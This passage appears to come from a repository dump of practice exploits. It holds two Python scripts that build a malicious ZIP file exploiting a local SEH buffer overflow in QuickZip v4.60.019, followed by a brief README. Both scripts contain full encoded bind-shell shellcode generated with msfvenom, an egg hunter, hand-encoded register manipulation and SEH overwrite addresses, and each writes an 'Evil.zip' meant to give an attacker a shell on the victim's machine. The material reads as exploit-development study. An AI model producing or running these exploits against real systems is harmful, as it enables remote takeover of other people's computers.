\n" }, { "path": "Local Buffer Overflow/QuickZipv4.60.019/Egg Hunter/Exploit.py", "content": "#!/usr/bin/python\r\n\r\n#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\\x00\\x0a\\x0d' -e x86/alpha_mixed BufferRegister=EDI -f python -v shellcode \r\n#Payload size: 710 bytes\r\nshellcode = \"T00WT00W\"\r\nshellcode += \"\\x57\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\"\r\nshellcode += \"\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x51\\x5a\\x6a\\x41\\x58\"\r\nshellcode += \"\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\"\r\nshellcode += \"\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\"\r\nshellcode += \"\\x42\\x75\\x4a\\x49\\x59\\x6c\\x58\\x68\\x4c\\x42\\x53\\x30\"\r\nshellcode += \"\\x35\\x50\\x65\\x50\\x55\\x30\\x6d\\x59\\x38\\x65\\x56\\x51\"\r\nshellcode += \"\\x79\\x50\\x73\\x54\\x6c\\x4b\\x46\\x30\\x36\\x50\\x6c\\x4b\"\r\nshellcode += \"\\x56\\x32\\x44\\x4c\\x6e\\x6b\\x70\\x52\\x44\\x54\\x4c\\x4b\"\r\nshellcode += \"\\x44\\x32\\x44\\x68\\x66\\x6f\\x68\\x37\\x33\\x7a\\x47\\x56\"\r\nshellcode += \"\\x74\\x71\\x4b\\x4f\\x4c\\x6c\\x55\\x6c\\x53\\x51\\x51\\x6c\"\r\nshellcode += \"\\x76\\x62\\x44\\x6c\\x67\\x50\\x4b\\x71\\x68\\x4f\\x44\\x4d\"\r\nshellcode += \"\\x67\\x71\\x4f\\x37\\x59\\x72\\x7a\\x52\\x62\\x72\\x76\\x37\"\r\nshellcode += \"\\x4e\\x6b\\x52\\x72\\x74\\x50\\x6e\\x6b\\x62\\x6a\\x57\\x4c\"\r\nshellcode += \"\\x6c\\x4b\\x50\\x4c\\x77\\x61\\x30\\x78\\x38\\x63\\x67\\x38\"\r\nshellcode += \"\\x76\\x61\\x5a\\x71\\x52\\x71\\x6c\\x4b\\x51\\x49\\x77\\x50\"\r\nshellcode += \"\\x45\\x51\\x49\\x43\\x6e\\x6b\\x71\\x59\\x76\\x78\\x4d\\x33\"\r\nshellcode += \"\\x37\\x4a\\x37\\x39\\x6c\\x4b\\x55\\x64\\x6e\\x6b\\x36\\x61\"\r\nshellcode += \"\\x4b\\x66\\x34\\x71\\x49\\x6f\\x6e\\x4c\\x4b\\x71\\x78\\x4f\"\r\nshellcode += \"\\x44\\x4d\\x73\\x31\\x48\\x47\\x64\\x78\\x6b\\x50\\x74\\x35\"\r\nshellcode += \"\\x68\\x76\\x54\\x43\\x71\\x6d\\x69\\x68\\x45\\x6b\\x63\\x4d\"\r\nshellcode += \"\\x54\\x64\\x52\\x55\\x4d\\x34\\x76\\x38\\x6e\\x6b\\x32\\x78\"\r\nshellcode += \"\\x56\\x44\\x67\\x71\\x48\\x53\\x52\\x46\\x4e\\x6b\\x76\\x6c\"\r\nshellcode += \"\\x30\\x4b\\x6c\\x4b\\x62\\x78\\x67\\x6c\\x47\\x71\\x6b\\x63\"\r\nshellcode += \"\\x6e\\x6b\\x77\\x74\\x4c\\x4b\\x66\\x61\\x6a\\x70\\x4b\\x39\"\r\nshellcode += \"\\x53\\x74\\x76\\x44\\x56\\x44\\x63\\x6b\\x51\\x4b\\x35\\x31\"\r\nshellcode += \"\\x76\\x39\\x62\\x7a\\x33\\x61\\x39\\x6f\\x49\\x70\\x43\\x6f\"\r\nshellcode += \"\\x61\\x4f\\x62\\x7a\\x6c\\x4b\\x62\\x32\\x7a\\x4b\\x4c\\x4d\"\r\nshellcode += \"\\x43\\x6d\\x70\\x68\\x76\\x53\\x37\\x42\\x45\\x50\\x45\\x50\"\r\nshellcode += \"\\x63\\x58\\x74\\x37\\x72\\x53\\x46\\x52\\x61\\x4f\\x66\\x34\"\r\nshellcode += \"\\x30\\x68\\x70\\x4c\\x71\\x67\\x74\\x66\\x36\\x67\\x6b\\x4f\"\r\nshellcode += \"\\x38\\x55\\x4f\\x48\\x6c\\x50\\x33\\x31\\x75\\x50\\x67\\x70\"\r\nshellcode += \"\\x34\\x69\\x4b\\x74\\x31\\x44\\x62\\x70\\x42\\x48\\x54\\x69\"\r\nshellcode += \"\\x4b\\x30\\x62\\x4b\\x63\\x30\\x39\\x6f\\x78\\x55\\x33\\x5a\"\r\nshellcode += \"\\x46\\x68\\x46\\x39\\x66\\x30\\x38\\x62\\x4b\\x4d\\x61\\x50\"\r\nshellcode += \"\\x30\\x50\\x47\\x30\\x46\\x30\\x65\\x38\\x68\\x6a\\x54\\x4f\"\r\nshellcode += \"\\x69\\x4f\\x6b\\x50\\x59\\x6f\\x6b\\x65\\x6f\\x67\\x55\\x38\"\r\nshellcode += \"\\x44\\x42\\x65\\x50\\x66\\x71\\x63\\x6c\\x4b\\x39\\x4a\\x46\"\r\nshellcode += \"\\x33\\x5a\\x42\\x30\\x32\\x76\\x43\\x67\\x55\\x38\\x6a\\x62\"\r\nshellcode += \"\\x69\\x4b\\x56\\x57\\x33\\x57\\x49\\x6f\\x78\\x55\\x73\\x67\"\r\nshellcode += \"\\x31\\x78\\x6e\\x57\\x58\\x69\\x57\\x48\\x39\\x6f\\x79\\x6f\"\r\nshellcode += \"\\x69\\x45\\x43\\x67\\x70\\x68\\x54\\x34\\x7a\\x4c\\x45\\x6b\"\r\nshellcode += \"\\x78\\x61\\x69\\x6f\\x4b\\x65\\x63\\x67\\x6a\\x37\\x65\\x38\"\r\nshellcode += \"\\x42\\x55\\x52\\x4e\\x72\\x6d\\x30\\x61\\x79\\x6f\\x6b\\x65\"\r\nshellcode += \"\\x35\\x38\\x52\\x43\\x30\\x6d\\x71\\x74\\x67\\x70\\x4b\\x39\"\r\nshellcode += \"\\x6b\\x53\\x31\\x47\\x62\\x77\\x31\\x47\\x76\\x51\\x49\\x66\"\r\nshellcode += \"\\x33\\x5a\\x57\\x62\\x31\\x49\\x73\\x66\\x6d\\x32\\x6b\\x4d\"\r\nshellcode += \"\\x53\\x56\\x69\\x57\\x73\\x74\\x67\\x54\\x55\\x6c\\x35\\x51\"\r\nshellcode += \"\\x45\\x51\\x6c\\x4d\\x73\\x74\\x51\\x34\\x52\\x30\\x5a\\x66\"\r\nshellcode += \"\\x45\\x50\\x42\\x64\\x71\\x44\\x42\\x70\\x32\\x76\\x53\\x66\"\r\nshellcode += \"\\x50\\x56\\x47\\x36\\x36\\x36\\x50\\x4e\\x52\\x76\\x32\\x76\"\r\nshellcode += \"\\x50\\x53\\x73\\x66\\x62\\x48\\x43\\x49\\x4a\\x6c\\x37\\x4f\"\r\nshellcode += \"\\x6c\\x46\\x79\\x6f\\x4b\\x65\\x4c\\x49\\x59\\x70\\x30\\x4e\"\r\nshellcode += \"\\x42\\x76\\x32\\x66\\x39\\x6f\\x50\\x30\\x51\\x78\\x74\\x48\"\r\nshellcode += \"\\x6f\\x77\\x45\\x4d\\x35\\x30\\x49\\x6f\\x4e\\x35\\x6d\\x6b\"\r\nshellcode += \"\\x6c\\x30\\x58\\x35\\x4e\\x42\\x46\\x36\\x73\\x58\\x6f\\x56\"\r\nshellcode += \"\\x6f\\x65\\x6f\\x4d\\x4f\\x6d\\x69\\x6f\\x7a\\x75\\x65\\x6c\"\r\nshellcode += \"\\x37\\x76\\x71\\x6c\\x45\\x5a\\x6d\\x50\\x79\\x6b\\x4b\\x50\"\r\nshellcode += \"\\x33\\x45\\x46\\x65\\x6d\\x6b\\x57\\x37\\x56\\x73\\x64\\x32\"\r\nshellcode += \"\\x52\\x4f\\x63\\x5a\\x47\\x70\\x51\\x43\\x49\\x6f\\x4a\\x75\"\r\nshellcode += \"\\x41\\x41\"\r\n\r\n####################### ZIP File Structure ######################## \r\n###################################################################\r\n######################## Local File Header ########################\r\nLocalFileHeader = '\\x50\\x4b\\x03\\x04' # local file header signature\r\nLocalFileHeader += '\\x14\\x00' # version needed to extract 0x14 = 20 -> 2.0\r\nLocalFileHeader += '\\x00\\x00' # general purpose bit flag\r\nLocalFileHeader += '\\x00\\x00' # compression method\r\nLocalFileHeader += '\\xb7\\xac' # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23\r\nLocalFileHeader += '\\xce\\x34' # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3\r\nLocalFileHeader += '\\x00\\x00\\x00' # CRC-32 '\\x00' was left out to make sure we hit 25 bytes before file length\r\nLocalFileHeader += '\\x00\\x00\\x00\\x00' # compressed size\r\nLocalFileHeader += '\\x00\\x00\\x00\\x00' # uncompressed size\r\nLocalFileHeader += '\\xe4\\x0f' # file name length 0x0fe4 = 4068 bytes \r\nLocalFileHeader += '\\x00\\x00' # extra field length\r\nLocalFileHeader += '\\x00' # file name\r\n#LocalFileHeader += '\\x00' # extra filed \r\n################## Central Directory File Header ##################\r\nCDFileHeader = '\\x50\\x4b\\x01\\x02' # cd file header signature \r\nCDFileHeader += '\\x14\\x00' # version made by 0x14 = 20 -> 2.0\r\nCDFileHeader += '\\x14\\x00' # version needed to extract 0x14 = 20 -> 2.0\r\nCDFileHeader += '\\x00\\x00' # general purpose bit flag\r\nCDFileHeader += '\\x00\\x00' # compression method \r\nCDFileHeader += '\\xb7\\xac' # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23\r\nCDFileHeader += '\\xce\\x34' # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3\r\nCDFileHeader += '\\x00\\x00\\x00\\x00' # CRC-32\r\nCDFileHeader += '\\x00\\x00\\x00\\x00' # compressed size\r\nCDFileHeader += '\\x00\\x00\\x00\\x00' # uncompressed size\r\nCDFileHeader += '\\xe4\\x0f' # file name length 0x0fe4 = 4068 bytes\r\nCDFileHeader += '\\x00\\x00' # extra field length\r\nCDFileHeader += '\\x00\\x00' # file comment length \r\nCDFileHeader += '\\x00\\x00' # disk number where file starts\r\nCDFileHeader += '\\x01\\x00' # internal file attributes BIT 0: apparent ASCII/text file\r\nCDFileHeader += '\\x24\\x00\\x00\\x00' # external file attributes \r\nCDFileHeader += '\\x00\\x00\\x00\\x00' # relative offset of local file header\r\n#CDFileHeader += '\\x00' # file name\r\n#CDFileHeader += '\\x00' # extra field \r\n#CDFileHeader += '\\x00' # file comment \r\n################ End of Central Directory Record ##################\r\nEOCDRHeader = '\\x50\\x4b\\x05\\x06' # End of central directory signature\r\nEOCDRHeader += '\\x00\\x00' # number of this disk \r\nEOCDRHeader += '\\x00\\x00' # disk where central directory starts \r\nEOCDRHeader += '\\x01\\x00' # number of central directory records on this disk \r\nEOCDRHeader += '\\x01\\x00' # total number of central directory records \r\nEOCDRHeader += '\\x12\\x10\\x00\\x00' # size of central directory (4114 bytes)\r\nEOCDRHeader += '\\x02\\x10\\x00\\x00' # offset of start of central directory, relative to start of archive \r\nEOCDRHeader += '\\x00\\x00' # comment length \r\n#EOCDRHeader += '\\x00' # comment \r\n\r\n#root@kali:~# msfvenom -a x86 --platform windows -e x86/alpha_mixed BufferRegister=EAX -b '\\x00' < /opt/OSCE/Tools/EggHunter.bin \r\n#Payload size: 118 bytes\r\nEggHunter = 'PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJISVoqkzYovoPBCbbJDBqHzm6NuldECj3DhoLxBtdpfPaGNkijLoT5kZlobUywkOxgAA'\r\n\r\nEvil = '\\x41' * 10 # filler to egghunter \r\nEvil += EggHunter # hunt baby hunt!\r\nEvil += '\\x42' * 47 # filler to the start of hand crafted shellcode\r\nEvil += '\\x54' # PUSH ESP * save stack pointer \r\nEvil += '\\x5F' # POP EDI * point eax to where we want to decode otherwise bad shellcode \r\nEvil += '\\x54' # push esp\r\nEvil += '\\x58' # pop eax\r\nEvil += '\\x05\\x21\\x13\\x11\\x11' # add eax,0x11111321\r\nEvil += '\\x05\\x21\\x16\\x11\\x11' # add eax,0x11111621\r\nEvil += '\\x2d\\x06\\x23\\x22\\x22' # sub eax,0x22222306 \r\nEvil += '\\x50' # PUSH EAX\r\nEvil += '\\x5C' # POP ESP * move eax value into stack pointer \r\nEvil += '\\x25\\x4A\\x4D\\x4E\\x55' # AND EAX,554E4D4A * decode 'mov esp, edi;jmp eax'\r\nEvil += '\\x25\\x35\\x32\\x31\\x2A' # AND EAX,2A313235\r\nEvil += '\\x05\\x44\\x76\\x77\\x61' # ADD EAX,61777644\r\nEvil += '\\x05\\x44\\x65\\x66\\x51' # ADD EAX,51666544\r\nEvil += '\\x05\\x34\\x54\\x55\\x61' # ADD EAX,61555434\r\nEvil += '\\x2D\\x33\\x33\\x33\\x33' # SUB EAX,33333333\r\nEvil += '\\x50' # PUSH EAX\r\nEvil += '\\x25\\x4A\\x4D\\x4E\\x55' # AND EAX,554E4D4A * point eax to egg hunter shellcode \r\nEvil += '\\x25\\x35\\x32\\x31\\x2A' # AND EAX,2A313235\r\nEvil += '\\x05\\x71\\x75\\x11\\x11' # ADD EAX,11117571\r\nEvil += '\\x05\\x71\\x75\\x11\\x11' # ADD EAX,11117571\r\nEvil += '\\x05\\x11\\x35\\x11\\x11' # ADD EAX,11113511\r\nEvil += '\\x2D\\x13\\x25\\x21\\x33' # SUB EAX,33212513\r\nEvil += '\\x41' * (294-10-len(EggHunter)-47-82)\r\nEvil += '\\x75\\x9f\\x74\\x9f' # nSEH JZ & JNZ (aka jump net)\r\nEvil += '\\x41\\x16\\x40\\x00' # SEH pop esi,pop ebx, retn in QuickZip.exe \r\nEvil += shellcode # egg + shellcode \r\nEvil += '\\x41' * (4064-294-4-4-len(shellcode))\r\nEvil += '.txt'\r\n\r\nbuffer = LocalFileHeader\r\nbuffer += Evil\r\nbuffer += CDFileHeader\r\nbuffer += Evil\r\nbuffer += EOCDRHeader \r\n\r\ntry:\r\n\tf=open(\"Evil.zip\",\"w\")\r\n\tprint \"[+] Creating %s bytes evil payload..\" %len(Evil)\r\n\tf.write(buffer)\r\n\tf.close()\r\n\tprint \"[+] File created!\"\r\nexcept Exception as e:\r\n\tprint e" }, { "path": "Local Buffer Overflow/QuickZipv4.60.019/OS Dependent/Exploit.py", "content": "#!/usr/bin/python\r\n\r\n# root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\\x00\\x0a\\x0d' -e x86/alpha_mixed BufferRegister=EAX -f python -v shellcode \r\n# Payload size: 710 bytes\r\nshellcode = \"\"\r\nshellcode += \"\\x50\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\"\r\nshellcode += \"\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x51\\x5a\\x6a\\x41\\x58\"\r\nshellcode += \"\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\"\r\nshellcode += \"\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\"\r\nshellcode += \"\\x42\\x75\\x4a\\x49\\x69\\x6c\\x69\\x78\\x4c\\x42\\x73\\x30\"\r\nshellcode += \"\\x37\\x70\\x57\\x70\\x55\\x30\\x6f\\x79\\x49\\x75\\x74\\x71\"\r\nshellcode += \"\\x39\\x50\\x72\\x44\\x4e\\x6b\\x76\\x30\\x64\\x70\\x6e\\x6b\"\r\nshellcode += \"\\x62\\x72\\x36\\x6c\\x4e\\x6b\\x76\\x32\\x34\\x54\\x6e\\x6b\"\r\nshellcode += \"\\x44\\x32\\x74\\x68\\x66\\x6f\\x68\\x37\\x32\\x6a\\x37\\x56\"\r\nshellcode += \"\\x35\\x61\\x6b\\x4f\\x4e\\x4c\\x65\\x6c\\x45\\x31\\x31\\x6c\"\r\nshellcode += \"\\x43\\x32\\x64\\x6c\\x75\\x70\\x79\\x51\\x4a\\x6f\\x66\\x6d\"\r\nshellcode += \"\\x76\\x61\\x6b\\x77\\x4d\\x32\\x7a\\x52\\x43\\x62\\x73\\x67\"\r\nshellcode += \"\\x6e\\x6b\\x61\\x42\\x34\\x50\\x6e\\x6b\\x42\\x6a\\x75\\x6c\"\r\nshellcode += \"\\x4c\\x4b\\x42\\x6c\\x57\\x61\\x63\\x48\\x6a\\x43\\x57\\x38\"\r\nshellcode += \"\\x73\\x31\\x58\\x51\\x73\\x61\\x4c\\x4b\\x66\\x39\\x47\\x50\"\r\nshellcode += \"\\x75\\x51\\x4e\\x33\\x6e\\x6b\\x37\\x39\\x32\\x38\\x49\\x73\"\r\nshellcode += \"\\x74\\x7a\\x67\\x39\\x4e\\x6b\\x50\\x34\\x4e\\x6b\\x35\\x51\"\r\nshellcode += \"\\x6e\\x36\\x56\\x51\\x39\\x6f\\x6c\\x6c\\x79\\x51\\x38\\x4f\"\r\nshellcode += \"\\x74\\x4d\\x57\\x71\\x39\\x57\\x56\\x58\\x79\\x70\\x31\\x65\"\r\nshellcode += \"\\x49\\x66\\x44\\x43\\x61\\x6d\\x4c\\x38\\x45\\x6b\\x63\\x4d\"\r\nshellcode += \"\\x45\\x74\\x72\\x55\\x7a\\x44\\x62\\x78\\x6e\\x6b\\x76\\x38\"\r\nshellcode += \"\\x47\\x54\\x76\\x61\\x59\\x43\\x70\\x66\\x4e\\x6b\\x36\\x6c\"\r\nshellcode += \"\\x70\\x4b\\x4e\\x6b\\x71\\x48\\x75\\x4c\\x76\\x61\\x4e\\x33\"\r\nshellcode += \"\\x6c\\x4b\\x56\\x64\\x6e\\x6b\\x46\\x61\\x7a\\x70\\x6b\\x39\"\r\nshellcode += \"\\x71\\x54\\x45\\x74\\x57\\x54\\x43\\x6b\\x33\\x6b\\x75\\x31\"\r\nshellcode += \"\\x30\\x59\\x61\\x4a\\x30\\x51\\x79\\x6f\\x39\\x70\\x63\\x6f\"\r\nshellcode += \"\\x43\\x6f\\x30\\x5a\\x6c\\x4b\\x52\\x32\\x48\\x6b\\x6c\\x4d\"\r\nshellcode += \"\\x43\\x6d\\x30\\x68\\x67\\x43\\x47\\x42\\x35\\x50\\x77\\x70\"\r\nshellcode += \"\\x53\\x58\\x34\\x37\\x32\\x53\\x64\\x72\\x43\\x6f\\x46\\x34\"\r\nshellcode += \"\\x31\\x78\\x72\\x6c\\x44\\x37\\x65\\x76\\x63\\x37\\x69\\x6f\"\r\nshellcode += \"\\x6e\\x35\\x4c\\x78\\x6e\\x70\\x53\\x31\\x57\\x70\\x65\\x50\"\r\nshellcode += \"\\x47\\x59\\x6a\\x64\\x71\\x44\\x42\\x70\\x70\\x68\\x44\\x69\"\r\nshellcode += \"\\x6b\\x30\\x42\\x4b\\x67\\x70\\x4b\\x4f\\x38\\x55\\x33\\x5a\"\r\nshellcode += \"\\x57\\x78\\x62\\x79\\x32\\x70\\x38\\x62\\x4b\\x4d\\x47\\x30\"\r\nshellcode += \"\\x36\\x30\\x73\\x70\\x50\\x50\\x62\\x48\\x7a\\x4a\\x74\\x4f\"\r\nshellcode += \"\\x6b\\x6f\\x39\\x70\\x69\\x6f\\x78\\x55\\x6a\\x37\\x32\\x48\"\r\nshellcode += \"\\x66\\x62\\x73\\x30\\x34\\x51\\x51\\x4c\\x4c\\x49\\x5a\\x46\"\r\nshellcode += \"\\x31\\x7a\\x42\\x30\\x31\\x46\\x66\\x37\\x55\\x38\\x68\\x42\"\r\nshellcode += \"\\x39\\x4b\\x44\\x77\\x51\\x77\\x49\\x6f\\x4a\\x75\\x32\\x77\"\r\nshellcode += \"\\x51\\x78\\x38\\x37\\x6a\\x49\\x75\\x68\\x69\\x6f\\x49\\x6f\"\r\nshellcode += \"\\x6a\\x75\\x70\\x57\\x71\\x78\\x43\\x44\\x68\\x6c\\x67\\x4b\"\r\nshellcode += \"\\x49\\x71\\x69\\x6f\\x69\\x45\\x51\\x47\\x6c\\x57\\x31\\x78\"\r\nshellcode += \"\\x54\\x35\\x42\\x4e\\x72\\x6d\\x71\\x71\\x59\\x6f\\x39\\x45\"\r\nshellcode += \"\\x45\\x38\\x33\\x53\\x72\\x4d\\x53\\x54\\x55\\x50\\x4c\\x49\"\r\nshellcode += \"\\x6b\\x53\\x42\\x77\\x51\\x47\\x76\\x37\\x70\\x31\\x79\\x66\"\r\nshellcode += \"\\x53\\x5a\\x32\\x32\\x73\\x69\\x66\\x36\\x49\\x72\\x39\\x6d\"\r\nshellcode += \"\\x70\\x66\\x48\\x47\\x51\\x54\\x47\\x54\\x35\\x6c\\x35\\x51\"\r\nshellcode += \"\\x56\\x61\\x6c\\x4d\\x47\\x34\\x34\\x64\\x32\\x30\\x7a\\x66\"\r\nshellcode += \"\\x35\\x50\\x43\\x74\\x73\\x64\\x46\\x30\\x70\\x56\\x50\\x56\"\r\nshellcode += \"\\x32\\x76\\x43\\x76\\x33\\x66\\x50\\x4e\\x62\\x76\\x43\\x66\"\r\nshellcode += \"\\x73\\x63\\x32\\x76\\x70\\x68\\x62\\x59\\x58\\x4c\\x47\\x4f\"\r\nshellcode += \"\\x6b\\x36\\x39\\x6f\\x4a\\x75\\x6c\\x49\\x69\\x70\\x72\\x6e\"\r\nshellcode += \"\\x52\\x76\\x33\\x76\\x39\\x6f\\x76\\x50\\x52\\x48\\x46\\x68\"\r\nshellcode += \"\\x6e\\x67\\x47\\x6d\\x33\\x50\\x79\\x6f\\x79\\x45\\x6f\\x4b\"\r\nshellcode += \"\\x78\\x70\\x6e\\x55\\x79\\x32\\x56\\x36\\x73\\x58\\x6e\\x46\"\r\nshellcode += \"\\x6a\\x35\\x4f\\x4d\\x4d\\x4d\\x59\\x6f\\x39\\x45\\x65\\x6c\"\r\nshellcode += \"\\x77\\x76\\x61\\x6c\\x47\\x7a\\x4f\\x70\\x79\\x6b\\x69\\x70\"\r\nshellcode += \"\\x62\\x55\\x54\\x45\\x6f\\x4b\\x51\\x57\\x56\\x73\\x64\\x32\"\r\nshellcode += \"\\x62\\x4f\\x52\\x4a\\x37\\x70\\x43\\x63\\x4b\\x4f\\x49\\x45\"\r\nshellcode += \"\\x41\\x41\"\r\n\r\n####################### ZIP File Structure ######################## \r\n###################################################################\r\n######################## Local File Header ########################\r\nLocalFileHeader = '\\x50\\x4b\\x03\\x04' # local file header signature\r\nLocalFileHeader += '\\x14\\x00' # version needed to extract 0x14 = 20 -> 2.0\r\nLocalFileHeader += '\\x00\\x00' # general purpose bit flag\r\nLocalFileHeader += '\\x00\\x00' # compression method\r\nLocalFileHeader += '\\xb7\\xac' # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23\r\nLocalFileHeader += '\\xce\\x34' # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3\r\nLocalFileHeader += '\\x00\\x00\\x00' # CRC-32 '\\x00' was left out to make sure we hit 25 bytes before file length\r\nLocalFileHeader += '\\x00\\x00\\x00\\x00' # compressed size\r\nLocalFileHeader += '\\x00\\x00\\x00\\x00' # uncompressed size\r\nLocalFileHeader += '\\xe4\\x0f' # file name length 0x0fe4 = 4068 bytes \r\nLocalFileHeader += '\\x00\\x00' # extra field length\r\nLocalFileHeader += '\\x00' # file name\r\n#LocalFileHeader += '\\x00' # extra filed \r\n################## Central Directory File Header ##################\r\nCDFileHeader = '\\x50\\x4b\\x01\\x02' # cd file header signature \r\nCDFileHeader += '\\x14\\x00' # version made by 0x14 = 20 -> 2.0\r\nCDFileHeader += '\\x14\\x00' # version needed to extract 0x14 = 20 -> 2.0\r\nCDFileHeader += '\\x00\\x00' # general purpose bit flag\r\nCDFileHeader += '\\x00\\x00' # compression method \r\nCDFileHeader += '\\xb7\\xac' # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23\r\nCDFileHeader += '\\xce\\x34' # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3\r\nCDFileHeader += '\\x00\\x00\\x00\\x00' # CRC-32\r\nCDFileHeader += '\\x00\\x00\\x00\\x00' # compressed size\r\nCDFileHeader += '\\x00\\x00\\x00\\x00' # uncompressed size\r\nCDFileHeader += '\\xe4\\x0f' # file name length 0x0fe4 = 4068 bytes\r\nCDFileHeader += '\\x00\\x00' # extra field length\r\nCDFileHeader += '\\x00\\x00' # file comment length \r\nCDFileHeader += '\\x00\\x00' # disk number where file starts\r\nCDFileHeader += '\\x01\\x00' # internal file attributes BIT 0: apparent ASCII/text file\r\nCDFileHeader += '\\x24\\x00\\x00\\x00' # external file attributes \r\nCDFileHeader += '\\x00\\x00\\x00\\x00' # relative offset of local file header\r\n#CDFileHeader += '\\x00' # file name\r\n#CDFileHeader += '\\x00' # extra field \r\n#CDFileHeader += '\\x00' # file comment \r\n################ End of Central Directory Record ##################\r\nEOCDRHeader = '\\x50\\x4b\\x05\\x06' # End of central directory signature\r\nEOCDRHeader += '\\x00\\x00' # number of this disk \r\nEOCDRHeader += '\\x00\\x00' # disk where central directory starts \r\nEOCDRHeader += '\\x01\\x00' # number of central directory records on this disk \r\nEOCDRHeader += '\\x01\\x00' # total number of central directory records \r\nEOCDRHeader += '\\x12\\x10\\x00\\x00' # size of central directory (4114 bytes)\r\nEOCDRHeader += '\\x02\\x10\\x00\\x00' # offset of start of central directory, relative to start of archive \r\nEOCDRHeader += '\\x00\\x00' # comment length \r\n#EOCDRHeader += '\\x00' # comment \r\n\r\nEvil = '\\x41' * 294\r\nEvil += '\\x75\\x06\\x74\\x06' # nSEH JZ & JNZ (aka jump net)\r\nEvil += '\\x3d\\x1b\\x7e\\x6d' # SEH pop esi,pop ebx, retn in D3DXOF.dll (OS module - WinXP SP3)\r\nEvil += '\\x41\\x41' # compensate for short jump\r\nEvil += '\\x54' # PUSH ESP * save stack pointer to edi \r\nEvil += '\\x5F' # POP EDI\r\nEvil += '\\x54' # PUSH ESP * point esp to where we want to decode otherwise bad shellcode\r\nEvil += '\\x58' # POP EAX\r\nEvil += '\\x05\\x24\\x13\\x11\\x11' # ADD EAX,11111324\r\nEvil += '\\x05\\x25\\x16\\x11\\x11' # ADD EAX,11111625\r\nEvil += '\\x2D\\x21\\x22\\x22\\x22' # SUB EAX,22222221\r\nEvil += '\\x50' # PUSH EAX\r\nEvil += '\\x5C' # POP ESP * mov eax to esp\r\n#root@kali:/opt/Slink# python Slink.py * decode the following \r\n#Enter your shellcode: 89FC89F8054E070000FFE0 mov esp,edi restore stack pointer \r\n#[!] Shellcode size is not divisible by 4 mov eax,edi use edi as an relative address \r\n#[+] Padding shellcode with 1 NOPS.. add eax,0x74e align eax to the start oh shellcode \r\n#[+] Encoding [90e0ff00].. jmp eax jump to shellcode \r\n#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..\r\nEvil += \"\\x25\\x4A\\x4D\\x4E\\x55\" ## and eax, 0x554e4d4a\r\nEvil += \"\\x25\\x35\\x32\\x31\\x2A\" ## and eax, 0x2a313235\r\nEvil += \"\\x05\\x11\\x77\\x61\\x41\" ## add eax, 0x41617711\r\nEvil += \"\\x05\\x11\\x66\\x51\\x41\" ## add eax, 0x41516611\r\nEvil += \"\\x05\\x11\\x55\\x61\\x41\" ## add eax, 0x41615511\r\nEvil += \"\\x2D\\x33\\x33\\x33\\x33\" ## sub eax, 0x33333333\r\nEvil += \"\\x50\" ## push eax\r\n#[+] Encoding [00074e05]..\r\n#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..\r\nEvil += \"\\x25\\x4A\\x4D\\x4E\\x55\" ## and eax, 0x554e4d4a\r\nEvil += \"\\x25\\x35\\x32\\x31\\x2A\" ## and eax, 0x2a313235\r\nEvil += \"\\x05\\x13\\x36\\x13\\x11\" ## add eax, 0x11133613\r\nEvil += \"\\x05\\x13\\x25\\x13\\x11\" ## add eax, 0x11132513\r\nEvil += \"\\x05\\x12\\x26\\x13\\x11\" ## add eax, 0x11132612\r\nEvil += \"\\x2D\\x33\\x33\\x32\\x33\" ## sub eax, 0x33323333\r\nEvil += \"\\x50\" ## push eax\r\n#[+] Encoding [f889fc89]..\r\n#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..\r\nEvil += \"\\x25\\x4A\\x4D\\x4E\\x55\" ## and eax, 0x554e4d4a\r\nEvil += \"\\x25\\x35\\x32\\x31\\x2A\" ## and eax, 0x2a313235\r\nEvil += \"\\x05\\x44\\x76\\x44\\x74\" ## add eax, 0x74447644\r\nEvil += \"\\x05\\x44\\x65\\x44\\x64\" ## add eax, 0x64446544\r\nEvil += \"\\x05\\x34\\x54\\x34\\x53\" ## add eax, 0x53345434\r\nEvil += \"\\x2D\\x33\\x33\\x33\\x33\" ## sub eax, 0x33333333\r\nEvil += \"\\x50\" ## push eax\r\nEvil += '\\x42' * (250-116)\r\nEvil += shellcode \r\nEvil += '\\x41' * (4064-294-4-4-250-len(shellcode))\r\nEvil += '.txt'\r\n\r\nbuffer = LocalFileHeader\r\nbuffer += Evil\r\nbuffer += CDFileHeader\r\nbuffer += Evil\r\nbuffer += EOCDRHeader \r\n\r\ntry:\r\n\tf=open(\"Evil.zip\",\"w\")\r\n\tprint \"[+] Creating %s bytes evil payload..\" %len(Evil)\r\n\tf.write(buffer)\r\n\tf.close()\r\n\tprint \"[+] File created!\"\r\nexcept Exception as e:\r\n\tprint e" }, { "path": "Local Buffer Overflow/QuickZipv4.60.019/README.md", "content": "### Quick Zip v4.60.019\nLocal SEH overwrite with restricted characters set. I thought this exploit was quite challenging yet fun!\n\n

\n \n

